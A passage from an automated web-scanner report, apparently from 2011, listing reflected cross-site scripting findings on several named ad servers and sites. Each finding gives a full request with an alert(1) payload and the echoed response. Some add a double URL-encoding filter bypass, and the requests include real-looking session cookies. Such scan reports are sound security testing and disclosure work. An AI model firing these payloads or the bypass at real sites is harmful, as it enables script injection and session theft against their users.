Content-Length: 395

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0e4411"><script>alert(1)</script>ac47f18584/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target="
...[SNIP]...

4.17. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ad4"><script>alert(1)</script>a8e06f27e2c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5132a8ad4"><script>alert(1)</script>a8e06f27e2c/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 396

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5132a8ad4"><script>alert(1)</script>a8e06f27e2c/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=">
...[SNIP]...

4.18. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7292a"><script>alert(1)</script>cdc932fa922 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5132/12299067292a"><script>alert(1)</script>cdc932fa922/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 396

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5132/12299067292a"><script>alert(1)</script>cdc932fa922/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=">
...[SNIP]...

4.19. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55314"><script>alert(1)</script>2025c2eac3c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5132/1229906/055314"><script>alert(1)</script>2025c2eac3c/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 396

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5132/1229906/055314"><script>alert(1)</script>2025c2eac3c/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=">
...[SNIP]...

4.20. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb5f"><script>alert(1)</script>5de7a93b83c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5132/1229906/0/2257eb5f"><script>alert(1)</script>5de7a93b83c/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 396

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5132/1229906/0/2257eb5f"><script>alert(1)</script>5de7a93b83c/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=">
...[SNIP]...

4.21. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2499b"><script>alert(1)</script>0337affee79 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D12969215771262499b"><script>alert(1)</script>0337affee79;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 396

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D12969215771262499b"><script>alert(1)</script>0337affee79;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=">
...[SNIP]...

4.22. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [kvq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

Issue detail

The value of the kvq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c7c"><script>alert(1)</script>73aeac3c218 was submitted in the kvq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=e5c7c"><script>alert(1)</script>73aeac3c218 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 396

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=e5c7c"><script>alert(1)</script>73aeac3c218">
...[SNIP]...

4.23. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e34"><script>alert(1)</script>42beed0cd1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&80e34"><script>alert(1)</script>42beed0cd1e=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 399

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&80e34"><script>alert(1)</script>42beed0cd1e=1">
...[SNIP]...

4.24. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs [var parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Issue detail

The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5d970%3balert(1)//85e58cc1d4b was submitted in the var parameter. This input was echoed as 5d970;alert(1)//85e58cc1d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&vn=omn&activityID=32638&advID=33048&var=s_1_Integrate_Eyeblaster_ACM_get_05d970%3balert(1)//85e58cc1d4b&rnd=9155849178792 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.rackspace.com/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001gL2MadKj0bdR00001fU+La50V0a+r00001h802ae7k0c6L00001gKXMaepH0bdR00001gKXNaepP0bdR00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001gNQ4ae7r0c9M00001ge4Hack+0bM000001; B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t3852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 06-May-2011 10:21:35 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 05 Feb 2011 15:21:35 GMT
Connection: close
Content-Length: 89

var s_1_Integrate_Eyeblaster_ACM_get_05d970;alert(1)//85e58cc1d4b = {"errorCode": "nc" };

4.25. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 286b8<script>alert(1)</script>b7b9580d4d was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_1&location=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&uid=W25t6coj820hSGmI286b8<script>alert(1)</script>b7b9580d4d&xy=251%2C232&wh=985%2C1012&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3D12D8119D7E0EE9993CA5854A82CAC7; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 137
Date: Sat, 05 Feb 2011 15:59:37 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("W25t6coj820hSGmI286b8<script>alert(1)</script>b7b9580d4d");

4.26. http://gigaom.com/2010/06/22/cloud-computing/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gigaom.com
Path:   /2010/06/22/cloud-computing/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 23d7a'><script>alert(1)</script>6c3841f6dc1 was submitted in the REST URL parameter 4. This input was echoed as 23d7a\'><script>alert(1)</script>6c3841f6dc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/06/22/cloud-computing23d7a'><script>alert(1)</script>6c3841f6dc1/ HTTP/1.1
Host: gigaom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 05 Feb 2011 15:28:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://gigaom.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 15:28:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=60
Pragma: no-cache
Content-Length: 82472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Timer: [Init] 0.133 | 0.133 --><html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<a href='http://gigaom.com/2010/06/22/cloud-computing23d7a\'><script>alert(1)</script>6c3841f6dc1/page/2/' class='go-page'>
...[SNIP]...

4.27. http://htcwiki.wetpaint.com/account/ellerburnes [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://htcwiki.wetpaint.com
Path:   /account/ellerburnes

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6860c%253cscript%253ealert%25281%2529%253c%252fscript%253ee2410f7e441 was submitted in the REST URL parameter 2. This input was echoed as 6860c<script>alert(1)</script>e2410f7e441 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /account/ellerburnes6860c%253cscript%253ealert%25281%2529%253c%252fscript%253ee2410f7e441 HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:07:22 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=; Domain=htcwiki.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1ScTwMqZAeui7tLDEkikBLW; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=CA2FCF825EAEF0C3F31FF2BEAE557522; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:07:22 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24947

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Smartphone Wiki</title>

   <meta name="description" content="HTC
...[SNIP]...
<i>ellerburnes6860c<script>alert(1)</script>e2410f7e441</i>
...[SNIP]...

4.28. http://htcwiki.wetpaint.com/account/heidianna [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://htcwiki.wetpaint.com
Path:   /account/heidianna

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae99d%253cscript%253ealert%25281%2529%253c%252fscript%253e3618331fda0 was submitted in the REST URL parameter 2. This input was echoed as ae99d<script>alert(1)</script>3618331fda0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /account/heidiannaae99d%253cscript%253ealert%25281%2529%253c%252fscript%253e3618331fda0 HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:07:28 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=; Domain=htcwiki.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1ScTwMqZAeui+hCCPQX9ohd; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=BE9914FABF088BEA75986B4ACEE64FA4; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:07:28 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24940

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Smartphone Wiki</title>

   <meta name="description" content="HTC
...[SNIP]...
<i>heidiannaae99d<script>alert(1)</script>3618331fda0</i>
...[SNIP]...

4.29. http://htcwiki.wetpaint.com/account/scottpj [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://htcwiki.wetpaint.com
Path:   /account/scottpj

Issue detail

